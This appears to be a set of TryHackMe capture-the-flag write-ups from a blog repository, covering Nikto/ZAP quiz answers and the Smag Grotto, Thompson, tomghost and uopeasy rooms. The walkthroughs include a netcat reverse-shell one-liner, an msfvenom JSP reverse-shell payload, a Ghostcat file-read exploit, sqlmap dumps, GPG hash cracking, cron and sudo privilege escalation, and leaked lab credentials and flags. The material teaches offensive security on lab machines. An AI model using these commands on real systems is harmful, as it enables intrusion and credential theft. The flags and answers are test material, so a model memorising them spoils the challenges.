there's more! How do we list all of the plugins are available? 100 | 101 | ``` 102 | -list-plugin 103 | ``` 104 | 105 | ![](https://imgur.com/76zbgL7.png) 106 | 107 | ### #12 On the flip-side of the database, plugins represent another core component to Nikto. Which switch do we use to instruct Nikto to use plugin checks to find out of date software on the target host? Keep in mind that when testing this command we need to specify the host we intend to run this against. For submitting your answer, use only the base command with the out of date option. 108 | 109 | ``` 110 | -plugin outated 111 | ``` 112 | 113 | ![](https://imgur.com/kWA0cZ6.png) 114 | 115 | ### #13 Finally, what if we'd like to use our plugins to run a series of standard tests against the target host? 116 | 117 | ``` 118 | -plugin tests 119 | ``` 120 | 121 | ![](https://imgur.com/b9bY8DX.png) 122 | 123 | --- 124 | 125 | A brief quiz and tutorial over using the OWASP Zap Scanner 126 | 127 | ### #1 Let's start simple and launch zap. This can be done in a number of ways (Commands: owasp-zap, zaproxy) or through launching it in the Kali GUI. 128 | 129 | ``` 130 | No awnser needed 131 | ``` 132 | 133 | ### #2 Launch ZAP, what option to we set in order to specify what we are attacking? 134 | 135 | ``` 136 | Url to attack 137 | ``` 138 | 139 | ![](https://imgur.com/kNmCXtC.png) 140 | 141 | ### #3 Launch the attack against our target! Throughout the course of this attack you may notice this is very similar to Nikto. Similar to Nessus vs. 142 | 143 | OpenVAS, Nikto and ZAP and both offer different perspectives on a host 144 | and, as such, it's useful to know how to leverage both scanning tools in order to maximize your own visibility in a situation wherein 'noise' 145 | doesn't particularly matter. 146 | 147 | ``` 148 | No awnser needed 149 | ``` 150 | 151 | ### #4 ZAP will discover a file that typically contains pages which well-behaved web indexing engines will read in order to know which sections of a site to avoid. What is the name of this file? (Lucky for us, our scanner isn't what we would call 'well-behaved'!) 152 | 153 | ``` 154 | /robots.txt 155 | ``` 156 | 157 | ![](https://imgur.com/NubBOtV.png) 158 | 159 | ### #5 One entry is included in the disallow section of this file, what is it? 160 | 161 | ``` 162 | / 163 | ``` 164 | 165 | ![](https://imgur.com/KdHnPBX.png) 166 | 167 | ### #6 ZAP will find a directory that contains images for our application, what is the path for that directory? (This is what will follows the name/ip of 168 | 169 | the website) 170 | 171 | ``` 172 | /dvwa/images 173 | ``` 174 | 175 | ![](https://imgur.com/To9An3c.png) 176 | 177 | ### #7 This website doesn't force a secure connection by default and ZAP isn't pleased with it. Which related cookie is ZAP upset about? 178 | 179 | ``` 180 | httpOnly 181 | ``` 182 | 183 | ![](https://imgur.com/A3rJmu1.png) 184 | 185 | ### #8 Featured in various rooms on TryHackMe, Cross-Site Scripting is a vicious attack that is becoming ever more common on the open web. What Alert does ZAP produce to let us know that this site is vulnerable to XSS? Note, there are often a couple warnings produced for this, look for one more so directly related to the web client. 186 | 187 | ``` 188 | Web Browser XSS Protection Not Enabled 189 | ``` 190 | 191 | ### #9 The ZAP proxy spider represents the component responsible for 'crawling' the site. What site is found to be out of scope? 192 | 193 | ![](https://imgur.com/tvDsmRF.png) 194 | 195 | ``` 196 | http://www.dvwa.co.uk/ 197 | ``` 198 | 199 | ### #10 ZAP will use primarily two methods in order to scan a website, which of these two HTTP methods requests content? 200 | 201 | ``` 202 | GET (logic) 203 | ``` 204 | 205 | ### #11 Which option attempts to submit content to the website? 206 | 207 | ``` 208 | POST 209 | ``` 210 | 211 | 212 | -------------------------------------------------------------------------------- /src/content/blog/smag-grotto.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Smag Grotto - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-07-30 5 | description: "Writeup for the Smag Grotto university of Portsmouth's beginner room" 6 | --- 7 | [TryHackMe | Smag Grotto](https://tryhackme.com/room/smaggrotto) 8 | 9 | Deploy the machine and get root privileges. 10 | 11 | --- 12 | 13 | ### Setup 14 | 15 | ``` 16 | [smaggrotto] nmap -A 10.10.192.6 2:01:00 17 | ``` 18 | 19 | ``` 20 | 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 21 | | ssh-hostkey: 22 | | 2048 74:e0:e1:b4:05:85:6a:15:68:7e:16:da:f2:c7:6b:ee (RSA) 23 | | 256 bd:43:62:b9:a1:86:51:36:f8:c7:df:f9:0f:63:8f:a3 (ECDSA) 24 | |_ 256 f9:e7:da:07:8f:10:af:97:0b:32:87:c9:32:d7:1b:76 (ED25519) 25 | 26 | 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 27 | | http-ls: Volume / 28 | | SIZE TIME FILENAME 29 | | 1.3K 2020-06-05 10:56 admin.php 30 | | 1.5K 2020-06-05 10:45 login.php 31 | | 139K 2020-06-05 10:19 materialize.min.css 32 | |_ 33 | |_http-server-header: Apache/2.4.18 (Ubuntu) 34 | |_http-title: Index of / 35 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 36 | ``` 37 | 38 | ![](https://i.imgur.com/D9PypUN.png) 39 | 40 | Let's see if there is something on the website 41 | 42 | ![](https://i.imgur.com/aXIQi2Y.png) 43 | 44 | Well nothing of the website let's see of there is some hidden dirrectory with gobuster/dirb 45 | 46 | ``` 47 | # Select your own wordlist 48 | [smaggrotto] gobuster -u 10.10.192.6 -w /opt/directory-list-2.3-medium.txt 49 | ``` 50 | 51 | ``` 52 | Gobuster v1.3 OJ Reeves (@TheColonial) 53 | ===================================================== 54 | [+] Mode : dir 55 | [+] Url/Domain : http://10.10.192.6/ 56 | [+] Threads : 10 57 | [+] Wordlist : /opt/directory-list-2.3-medium.txt 58 | [+] Status codes : 200,204,301,302,307 59 | ===================================================== 60 | /mail (Status: 301) 61 | ``` 62 | 63 | ![](https://i.imgur.com/V1XUxTY.png) 64 | 65 | ![](https://i.imgur.com/UZZG0pk.png) 66 | 67 | Nice there is something interesting on this webpage let's download the pcap (wireshark) file and extract the juicy data 👀 68 | 69 | ![](https://i.imgur.com/FZ4Kz25.png) 70 | 71 | The simple way to extract the data is to select the first packet then go to the "Analyse" tab the click on the "Follow" then "TCP Stream" 72 | 73 | ![](https://i.imgur.com/yKY9pMB.png) 74 | 75 | ![](https://i.imgur.com/RR1fGLX.png) 76 | 77 | Nice we successfully have the username and the password but for what ? The SSH ? Or something else ? 🙄 78 | 79 | Before trying the SSH connection with those credentials, you can see on the TCP Stream there is a Host : "development.smag.thm", let's take a look to this link. 80 | 81 | To add this host you need to edit your "/etc/hosts" file. 82 | 83 | ![](https://i.imgur.com/Q5KPLgs.png) 84 | 85 | ![](https://i.imgur.com/FLbTQw7.png) 86 | 87 | Well let's use the credentials that the TCP Stream gives us 88 | 89 | ``` 90 | h[nope 👁👄👁]k:cH[nope 👁👄👁]0w 91 | ``` 92 | 93 | ![](https://i.imgur.com/L0iBMqp.png) 94 | 95 | Nice, we can execute remote command let's try a reverse shell 🤩 96 | 97 | ![](https://i.imgur.com/UJiq34Y.png) 98 | 99 | (This is actually my own chrome extension to generate some reverse shell and more..) 100 | 101 | [LasCC/Hack-Tools](https://github.com/LasCC/Hack-Tools) 102 | 103 | ``` 104 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.28.116 1337 >/tmp/f 105 | ``` 106 | 107 | ![](https://i.imgur.com/4pVmO2j.png) 108 | 109 | Nice we have a reverse shell, let's see if we can have the first flag 🏅 110 | 111 | ![](https://i.imgur.com/i1MkJLx.png) 112 | 113 | As you can see we don't have the permission to see the content of the file let's upload LinEnum to see if there is some potential attacks that we can perform. 114 | 115 | ![](https://i.imgur.com/G9PaoMF.png) 116 | 117 | Ah, I found something very interesting with the cronjob 118 | 119 | ![](https://i.imgur.com/MkUFU4L.png) 120 | 121 | As you can see the cronjob is taking the jake's backup SSH public key and add it to the authorised keys, if we create our own key and modify the backup file we can access the server ☺️ 122 | 123 | First let's generate our own SSH public key 👍 124 | 125 | ``` 126 | [smaggrotto] ssh-keygen -o 127 | ``` 128 | 129 | ![](https://i.imgur.com/kXjks3E.png) 130 | 131 | Nice we have our own SSH public key let's change the backup file on the server 👍 132 | 133 | ![](https://i.imgur.com/Q7IGUeR.png) 134 | 135 | Now let's wait one or two minutes and then we can log to the server with the jake username 😀 136 | 137 | ``` 138 | [smaggrotto] ssh -i [Path to your ssh key] jake@10.10.192.6 139 | ``` 140 | 141 | ![](https://i.imgur.com/hEeAJH6.png) 142 | 143 | And voilà ! You have the access to the remote server ! 🎉 144 | 145 | ### **#1 What is the user flag?** 146 | 147 | ``` 148 | iusGo[nope 👁👄👁]uqU3j 149 | ``` 150 | 151 | ![](https://i.imgur.com/5xn3kch.png) 152 | 153 | ### **#2 What is the root flag?** 154 | 155 | Now let's get a root access 😍 156 | 157 | ![](https://i.imgur.com/TcRPpC7.png) 158 | 159 | ![](https://i.imgur.com/9sh8unG.png) 160 | 161 | [apt get | GTFOBins](https://gtfobins.github.io/gtfobins/apt-get/#sudo) 162 | 163 | ![](https://i.imgur.com/iDrkgGN.png) 164 | 165 | ``` 166 | uJr6zRgetan[nope 👁👄👁]bBKz2T 167 | ``` 168 | 169 | 170 | -------------------------------------------------------------------------------- /src/content/blog/the-impossible-challenge.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "The Impossible Challenge - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-07-19 5 | description: "Writeup for the The Impossible Challenge room" 6 | --- 7 | [TryHackMe | The Impossible Challenge](https://tryhackme.com/room/theimpossiblechallenge) 8 | 9 | Download the file, and find the Flag! 10 | 11 | ``` 12 | qo qt q`r6 ro su pn s_ rn r6 p6 s_ q2 ps qq rs rp ps rt r4 pu pt qn r4 rq pt q` so pu ps r4 sq pu ps q2 su rn on oq o\_ pu ps ou r5 pu pt r4 sr rp qt pu rs q2 qt r4 r4 ro su pq o5 13 | ``` 14 | 15 | Let's download the file to see if there is some kind of help ? 16 | 17 | ![](https://i.imgur.com/yjvNp4i.png) 18 | 19 | Err, we need a password let's see if we can decode the hidden message that the creator of the room tell us. 20 | 21 | ![](https://i.imgur.com/ap2H90U.png) 22 | 23 | ``` 24 | ROT13 > ROT47 > HEX > Base64 25 | -- 26 | It's inside the text, in front of your eyes! 27 | ``` 28 | 29 | Hmm well, there is something hidden in front of my eyes 👀 Let's find it ! 30 | 31 | ![](https://i.imgur.com/GjqBC5j.png) 32 | 33 | When you hover the description message on the room you can see there is something odd, let's see if we can decode it ! 34 | 35 | This is unicode steganography with Zero-With Characters 36 | 37 | [Unicode Steganography with Zero-Width Characters](https://330k.github.io/misc_tools/unicode_steganography.html) 38 | 39 | ![](https://i.imgur.com/aXK0yTK.png) 40 | 41 | ``` 42 | Password to decode the archive : hahaezpz 43 | ``` 44 | 45 | ![](https://i.imgur.com/8PEL4sW.png) 46 | 47 | ``` 48 | THM{Zero_Width_Characters_EZPZ} 49 | ``` 50 | 51 | 52 | -------------------------------------------------------------------------------- /src/content/blog/thompson.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Thompson - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-06-07 5 | description: "Writeup for the Thompson room on TryHackMe" 6 | --- 7 | [TryHackMe | Thompson](https://tryhackme.com/room/bsidesgtthompson) 8 | Read user.txt and root.txt 9 | 10 | --- 11 | 12 | ### Setup 13 | 14 | ``` 15 | ➜ TryHackMe nmap -A -vv 10.10.221.95 16 | ``` 17 | 18 | ``` 19 | 22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 20 | | ssh-hostkey: 21 | | 2048 fc:05:24:81:98:7e:b8:db:05:92:a6:e7:8e:b0:21:11 (RSA) 22 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL+0hfJnh2z0jia21xVo/zOSRmzqE/qWyQv1G+8EJNXze3WPjXsC54jYeO0lp2SGq+sauzNvmWrHcrLKHtugMUQmkS9gD/p4zx4LjuG0WKYYeyLybs4WrTTmCU8PYGgmud9SwrDlEjX9AOEZgP/gj1FY+x+TfOtIT2OEE0Exvb86LhPj/AqdahABfCfxzHQ9ZyS6v4SMt/AvpJs6Dgady20CLxhYGY9yR+V4JnNl4jxwg2j64EGLx4vtCWNjwP+7ROkTmP6dzR7DxsH1h8Ko5C45HbTIjFzUmrJ1HMPZMo9ss0MsmeXPnZTmp5TxsxbLNJGSbDv7BS9gdCyTf0+Qq1 23 | | 256 60:c8:40:ab:b0:09:84:3d:46:64:61:13:fa:bc:1f:be (ECDSA) 24 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG6CiO2B7Uei2whKgUHjLmGY7dq1uZFhZ3wY5EWj5L7ylSj+bx5pwaiEgU/Velkp4ZWXM//thL6K1lAAPGLxHMM= 25 | | 256 b5:52:7e:9c:01:9b:98:0c:73:59:20:35:ee:23:f1:a5 (ED25519) 26 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIwYtK4oCnQLSoBYAztlgcEsq8FLNL48LyxC2RfxC+33 27 | 28 | 8009/tcp open ajp13 syn-ack Apache Jserv (Protocol v1.3) 29 | |_ajp-methods: Failed to get a valid response for the OPTION request 30 | 31 | 8080/tcp open http syn-ack Apache Tomcat 8.5.5 32 | |_http-favicon: Apache Tomcat 33 | | http-methods: 34 | |_ Supported Methods: GET HEAD POST 35 | |_http-title: Apache Tomcat/8.5.5 36 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 37 | ``` 38 | 39 | ![](https://imgur.com/gQ8AzdM.png) 40 | 41 | Let's try the "manager app" button 42 | 43 | ![](https://imgur.com/Ty59zwz.png) 44 | 45 | Well, I tried the cancel button because I don't have any credentials 46 | 47 | ![](https://imgur.com/0wnAZv3.png) 48 | 49 | For some obscure reason (maybe bad configuration) there is a password and a username let's try it ! 🤨 50 | 51 | ![](https://imgur.com/x0PrhCR.png) 52 | 53 | ![](https://imgur.com/7CTEfM6.png) 54 | 55 | Well that worked let's see if there is a way to upload some reverse shell 🤑 56 | 57 | ![](https://imgur.com/n7GjOi7.png) 58 | 59 | I noticed a WAR file uploader let's search something on github/google 60 | 61 | [Multiple Ways to Exploit Tomcat Manager](https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/) 62 | 63 | ``` 64 | ➜ TryHackMe msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.9.2.228 LPORT=1234 -f war > shell.war 65 | ``` 66 | 67 | ![](https://imgur.com/FwO3JC4.png) 68 | 69 | ### #1 user.txt 70 | 71 | ``` 72 | 39400c90bc683a41a8935e4719f181bf 73 | ``` 74 | 75 | ### #2 root.txt 76 | 77 | ``` 78 | $ id 79 | uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat) 80 | 81 | $ bash id.sh 82 | id.sh: line 2: test.txt: Permission denied 83 | 84 | $ cat id.sh 85 | #!/bin/bash 86 | id > test.txt 87 | 88 | $ cat test.txt 89 | uid=0(root) gid=0(root) groups=0(root) 90 | ``` 91 | 92 | If we copy the content root key on the [id.sh](http://id.sh) it should be executed with root privileges let's try that ! :D 93 | 94 | ``` 95 | echo "cp /root/root.txt /home/jack/root.txt" > id.sh 96 | ``` 97 | 98 | ``` 99 | # Its a cron job its gonna take some time.. 100 | $ cat id.sh 101 | cp /root/root.txt /home/jack/root.txt 102 | 103 | $ ls 104 | id.sh root.txt test.txt user.txt 105 | 106 | $ cat root.txt 107 | d89d5391984c0450a95497153ae7ca3a 108 | ``` 109 | 110 | 111 | -------------------------------------------------------------------------------- /src/content/blog/tomghost.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "tomghost - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-05-12 5 | description: "Writeup for the tomghost challenge" 6 | --- 7 | [TryHackMe | tomghost](https://tryhackme.com/room/tomghost) 8 | 9 | ![](https://i.imgur.com/fR0jVuM.png) 10 | 11 | **Are you able to complete the challenge?** 12 | 13 | The machine may a take up to 5 minutes to boot and configure. 14 | 15 | ### Setup 16 | 17 | ``` 18 | nmap -sV -sC -vv 10.10.68.237 19 | ``` 20 | 21 | ``` 22 | Discovered open port 53/tcp on 10.10.68.237 23 | Discovered open port 22/tcp on 10.10.68.237 24 | Discovered open port 8080/tcp on 10.10.68.237 25 | Discovered open port 8009/tcp on 10.10.68.237 26 | ``` 27 | 28 | ``` 29 | 22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 30 | | ssh-hostkey: 31 | | 2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA) 32 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQvC8xe2qKLoPG3vaJagEW2eW4juBu9nJvn53nRjyw7y/0GEWIxE1KqcPXZiL+RKfkKA7RJNTXN2W9kCG8i6JdVWs2x9wD28UtwYxcyo6M9dQ7i2mXlJpTHtSncOoufSA45eqWT4GY+iEaBekWhnxWM+TrFOMNS5bpmUXrjuBR2JtN9a9cqHQ2zGdSlN+jLYi2Z5C7IVqxYb9yw5RBV5+bX7J4dvHNIs3otGDeGJ8oXVhd+aELUN8/C2p5bVqpGk04KI2gGEyU611v3eOzoP6obem9vsk7Kkgsw7eRNt1+CBrwWldPr8hy6nhA6Oi5qmJgK1x+fCmsfLSH3sz1z4Ln 33 | | 256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA) 34 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOscw5angd6i9vsr7MfCAugRPvtx/aLjNzjAvoFEkwKeO53N01Dn17eJxrbIWEj33sp8nzx1Lillg/XM+Lk69CQ= 35 | | 256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519) 36 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGqgzoXzgz5QIhEWm3+Mysrwk89YW2cd2Nmad+PrE4jw 37 | 38 | 53/tcp open tcpwrapped syn-ack 39 | 40 | 8009/tcp open ajp13 syn-ack Apache Jserv (Protocol v1.3) 41 | | ajp-methods: 42 | |_ Supported methods: GET HEAD POST OPTIONS 43 | 44 | 8080/tcp open http syn-ack Apache Tomcat 9.0.30 45 | |_http-favicon: Apache Tomcat 46 | | http-methods: 47 | |_ Supported Methods: GET HEAD POST OPTIONS 48 | |_http-open-proxy: Proxy might be redirecting requests 49 | |_http-title: Apache Tomcat/9.0.30 50 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 51 | ``` 52 | 53 | After trying to exploit the Apache Tomcat, I realize that I was wrong about that, so I tried the other port 8009 Apache Jserv I search on github for one exploit and I found this. 54 | 55 | [00theway/Ghostcat-CNVD-2020-10487](https://github.com/00theway/Ghostcat-CNVD-2020-10487) 56 | 57 | ``` 58 | python3 ajpShooter.py http://10.10.68.237:8080 8009 /WEB-INF/web.xml read 59 | # URL:PORT + Jserv PORT + /WEB-INF/web.xml read 60 | ``` 61 | 62 | ![](https://imgur.com/FtZHUNJ.png") 63 | 64 | ``` 65 | skyfuck:8730281lkjlkjdqlksalks 66 | # Let's try to ssh this 67 | ``` 68 | 69 | ![](https://imgur.com/fsV6mGi.png") 70 | 71 | ### #1 Compromise this machine and obtain user.txt 72 | 73 | ![](https://imgur.com/XCy6lRK.png") 74 | 75 | ``` 76 | skyfuck@ubuntu:~$ cd /home 77 | skyfuck@ubuntu:/home$ ls 78 | merlin skyfuck 79 | skyfuck@ubuntu:/home$ cd merlin/ 80 | skyfuck@ubuntu:/home/merlin$ ls 81 | user.txt 82 | skyfuck@ubuntu:/home/merlin$ cat user.txt 83 | THM{GhostCat_1s_so_cr4sy} 84 | ``` 85 | 86 | ### #2 Escalate privileges and obtain root.txt 87 | 88 | If you going back to the skyfuck's home directory you will see the "credential.pgp" "tryhackme.asc" 89 | 90 | let's scp them to our machine to crack them. 91 | 92 | ``` 93 | ➜ TryHackMe scp skyfuck@10.10.68.237:/home/skyfuck/credential.pgp . 94 | skyfuck@10.10.68.237 password: 95 | credential.pgp 96 | 97 | ➜ TryHackMe scp skyfuck@10.10.68.237:/home/skyfuck/tryhackme.asc . 98 | skyfuck@10.10.68.237 password: 99 | tryhackme.asc 100 | ``` 101 | 102 | For this i'll use gpg2john 103 | 104 | ``` 105 | ➜ TryHackMe sudo gpg2john tryhackme.asc > bopme 106 | 107 | File tryhackme.asc 108 | ➜ TryHackMe cat bopme 109 | tryhackme:$gpg$*17*54*3072*713ee3f57cc950f8f89155679abe2476c62bbd286ded0e049f886d32d2b9eb06f482e9770c710abc2903f1ed70af6fcc22f5608760be*3*254*2*9*16*0c99d5dae8216f2155ba2abfcc71f818*65536*c8f277d2faf97480:::tryhackme ::tryhackme.asc 110 | ``` 111 | 112 | Now the fun part crack the gpg ! 113 | 114 | ``` 115 | ➜ TryHackMe sudo john bopme --wordlist=/usr/share/wordlists/rockyou.txt 116 | Using default input encoding: UTF-8 117 | Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64]) 118 | Cost 1 (s2k-count) is 65536 for all loaded hashes 119 | Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes 120 | Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes 121 | Will run 2 OpenMP threads 122 | Press 'q' or Ctrl-C to abort, almost any other key for status 123 | 124 | "alexandru" (tryhackme) 125 | 126 | 1g 0:00:00:00 DONE (2020-05-12 14:27) 10.00g/s 10720p/s 10720c/s 10720C/s chinita..alexandru 127 | Use the "--show" option to display all of the cracked passwords reliably 128 | Session completed 129 | ``` 130 | 131 | Nice we have the password 132 | 133 | ``` 134 | alexandru 135 | ``` 136 | 137 | Now let's decrypt the pgp file, but first let's import the tryhackme.asc 138 | 139 | ``` 140 | ➜ TryHackMe gpg --import tryhackme.asc 141 | gpg: key 8F3DA3DEC6707170: "tryhackme " not changed 142 | gpg: key 8F3DA3DEC6707170: secret key imported 143 | gpg: key 8F3DA3DEC6707170: "tryhackme " not changed 144 | gpg: Total number processed: 2 145 | gpg: unchanged: 2 146 | gpg: secret keys read: 1 147 | gpg: secret keys imported: 1 148 | 149 | # password => alexandru 150 | ``` 151 | 152 | ``` 153 | ➜ TryHackMe gpg --decrypt credential.pgp 154 | gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences 155 | gpg: encrypted with 1024-bit ELG key, ID 61E104A66184FBCC, created 2020-03-11 156 | "tryhackme " 157 | merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j 158 | ``` 159 | 160 | Nice we have the merlin's ssh password 161 | 162 | ![](https://imgur.com/zrEzvSs.png") 163 | 164 | Let's root the machine ! 165 | 166 | [zip | GTFOBins](https://gtfobins.github.io/gtfobins/zip/) 167 | 168 | ``` 169 | merlin@ubuntu:~$ TF=$(mktemp -u) 170 | merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #' 171 | adding: etc/hosts (deflated 31%) 172 | $ id 173 | uid=0(root) gid=0(root) groups=0(root) 174 | $ cd /root/ 175 | $ ls 176 | root.txt ufw 177 | $ cat root.txt 178 | THM{Z1P_1S_FAKE} 179 | 180 | ``` 181 | 182 | 183 | -------------------------------------------------------------------------------- /src/content/blog/uopeasy.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "uopeasy - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-07-18 5 | description: "Writeup for the uopeasy university of Portsmouth's beginner room" 6 | --- 7 | [TryHackMe | uopeasy](https://tryhackme.com/room/uopeasy) 8 | 9 | University of Portsmouth's beginner room. 10 | 11 | In this set of tasks you will learn the following: 12 | 13 | - Basic SQL injection 14 | - Use of reconnaissance tool 15 | - nmap 16 | - WordPress RCE and reverse shells 17 | - Cracking the hash (John the ripper / hashcat) 18 | - Possibly Nikto 19 | - Burp Suite or dirbuster 20 | 21 | The main goal here is to learn as much as possible. Make sure you are connected to our network using your [OpenVPN configuration file](https://tryhackme.com/access). 22 | 23 | --- 24 | 25 | ### Setup 26 | 27 | ``` 28 | ➜ TryHackMe nmap -A -vv 10.10.180.236 29 | ``` 30 | 31 | ``` 32 | 80/tcp open http syn-ack Apache httpd 2.4.7 ((Ubuntu)) 33 | | http-methods: 34 | |_ Supported Methods: OPTIONS GET HEAD POST 35 | |_http-server-header: Apache/2.4.7 (Ubuntu) 36 | |_http-title: Site doesnt have a title (text/html). 37 | 38 | 443/tcp open ssl/http syn-ack Apache httpd 39 | |_http-favicon: Unknown favicon MD5: A8B5AD142FFA4621B3DBF67BDECA483A 40 | | http-methods: 41 | |_ Supported Methods: GET HEAD POST OPTIONS 42 | |_http-server-header: Apache 43 | |_http-title: 400 Bad Request 44 | | ssl-cert: Subject: commonName=www.example.com 45 | | Issuer: commonName=www.example.com 46 | | Public Key type: rsa 47 | | Public Key bits: 1024 48 | | Signature Algorithm: sha1WithRSAEncryption 49 | | Not valid before: 2015-02-17T03:30:05 50 | | Not valid after: 2025-02-14T03:30:05 51 | | MD5: ebd4 a980 6e51 1b13 769e d4b1 28f9 71dd 52 | | SHA-1: 6297 03e9 f83b 06e7 d50d 3f4b 5bae 38c9 7665 cc64 53 | | -----BEGIN CERTIFICATE----- 54 | | MIIBqzCCARQCCQDg5heFLm8t8jANBgkqhkiG9w0BAQUFADAaMRgwFgYDVQQDDA93 55 | | d3cuZXhhbXBsZS5jb20wHhcNMTUwMjE3MDMzMDA1WhcNMjUwMjE0MDMzMDA1WjAa 56 | | MRgwFgYDVQQDDA93d3cuZXhhbXBsZS5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0A 57 | | MIGJAoGBANFjfgmsBCGKWfdqCYZnY2mKvtUnYFtenVjtqdReduE12yavSQZuWAi2 58 | | jIpCUMwG7RG3QAwyzCoMWAzF/tZimI8uNL8G9m84l/wQAbTPMPJTgJXpwY0/9IRc 59 | | hdqtpFoVS251qA9AvPeqMv/hV+rKVAkYcONB6Q8Or8S6ifkEBAZbAgMBAAEwDQYJ 60 | | KoZIhvcNAQEFBQADgYEAQ3Kt0nVDLMkAv9/k1bt6KaM06cvTtiekgu0ugxA0TNXC 61 | | FNIBqu/Fasog43FRLuUtAtNCNMqI5QAAVPatQPk1QmVoE+IxbvxldrKykZk9oXkj 62 | | 5rbE43BAkxyiMvuNsZh7W2Lzx14tlA84c8B4Y1S0CqoVLpaJaCQ5MtVMSya3wAM= 63 | |_-----END CERTIFICATE----- 64 | 65 | 8080/tcp open http syn-ack Apache httpd 66 | |_http-favicon: Unknown favicon MD5: A8B5AD142FFA4621B3DBF67BDECA483A 67 | | http-methods: 68 | |_ Supported Methods: GET HEAD POST OPTIONS 69 | |_http-open-proxy: Proxy might be redirecting requests 70 | |_http-server-header: Apache 71 | |_http-title: Site doesn't have a title (text/html). 72 | ``` 73 | 74 | ![https://imgur.com/9SK08g2.png](https://imgur.com/9SK08g2.png) 75 | 76 | ![https://imgur.com/G7Wb80W.png](https://imgur.com/G7Wb80W.png) 77 | 78 | ### #1 Deploy the machine and connect to **our network.** 79 | 80 | ``` 81 | No awnser needed 82 | ``` 83 | 84 | ### #2 Do some basic reconnaissance on the website. What pages can you view? What ports are open? What can you access? 85 | 86 | ``` 87 | No awnser needed 88 | ``` 89 | 90 | ### #3 You should have found some additional pages on different ports. What service does the site most likely use for this page? 91 | 92 | ``` 93 | mysql 94 | ``` 95 | 96 | ### #4 Using the fact that this site has this service running, how can you exploit it? Do not use SQLMap yet.. 97 | 98 | ``` 99 | Since this is some php room let's say that is SQLi (SQL Injection) 100 | ``` 101 | 102 | ``` 103 | SQLi 104 | ``` 105 | 106 | ### #5 Try and return 1 on the page by entering certain characters into the form. 107 | 108 | ``` 109 | No awnser needed 110 | ``` 111 | 112 | ### #6 Using SQL injection, can you extract the username and password for this form? You may need the help of Burp's intruder function OR SQLMap. 113 | 114 | ``` 115 | No awnser needed 116 | ``` 117 | 118 | ### #7 What was the username? 119 | 120 | Dump the database using sqlmap 121 | 122 | ``` 123 | ➜ ~ sqlmap -u http://10.10.180.236/login.php --forms -dbs 124 | ``` 125 | 126 | ![https://imgur.com/9yukJFN.png](https://imgur.com/9yukJFN.png) 127 | 128 | ![https://imgur.com/lu0ABlM.png](https://imgur.com/lu0ABlM.png) 129 | 130 | Let's see the content of the wordpress8080 table 131 | 132 | ``` 133 | ➜ ~ sqlmap -u http://10.10.180.236/login.php –forms –dbs –dump-all -D wordpress8080 134 | ``` 135 | 136 | ![https://imgur.com/ucY2JNZ.png](https://imgur.com/ucY2JNZ.png) 137 | 138 | Credentials retrieved 139 | 140 | ``` 141 | Username : admin 142 | Password : SuperSecretPassword 143 | ``` 144 | 145 | ### #8 What was the password? 146 | 147 | ``` 148 | SuperSecretPassword 149 | ``` 150 | 151 | ### #9 Now you have these credentials, where else on the site can you go? Using the credentials you have and another part of the site, login and try to execute remote commands on the server. 152 | 153 | ``` 154 | No awnser needed 155 | ``` 156 | 157 | ### #10 Can you get a reverse shell back to your local machine? 158 | 159 | ``` 160 | No awnser needed 161 | ``` 162 | 163 | ### #11 Can you crack anyones password? Using the very popular rockyou.txt 164 | 165 | ``` 166 | No awnser needed 167 | ``` 168 | 169 | ### #12 What is the final cracked hash password for the user "user"? 170 | 171 | Let's upload the reverse shell on the wordpress blog 172 | 173 | ![https://imgur.com/z6QQkJF.png](https://imgur.com/z6QQkJF.png) 174 | 175 | ![https://imgur.com/AIcHLNM.png](https://imgur.com/AIcHLNM.png) 176 | 177 | 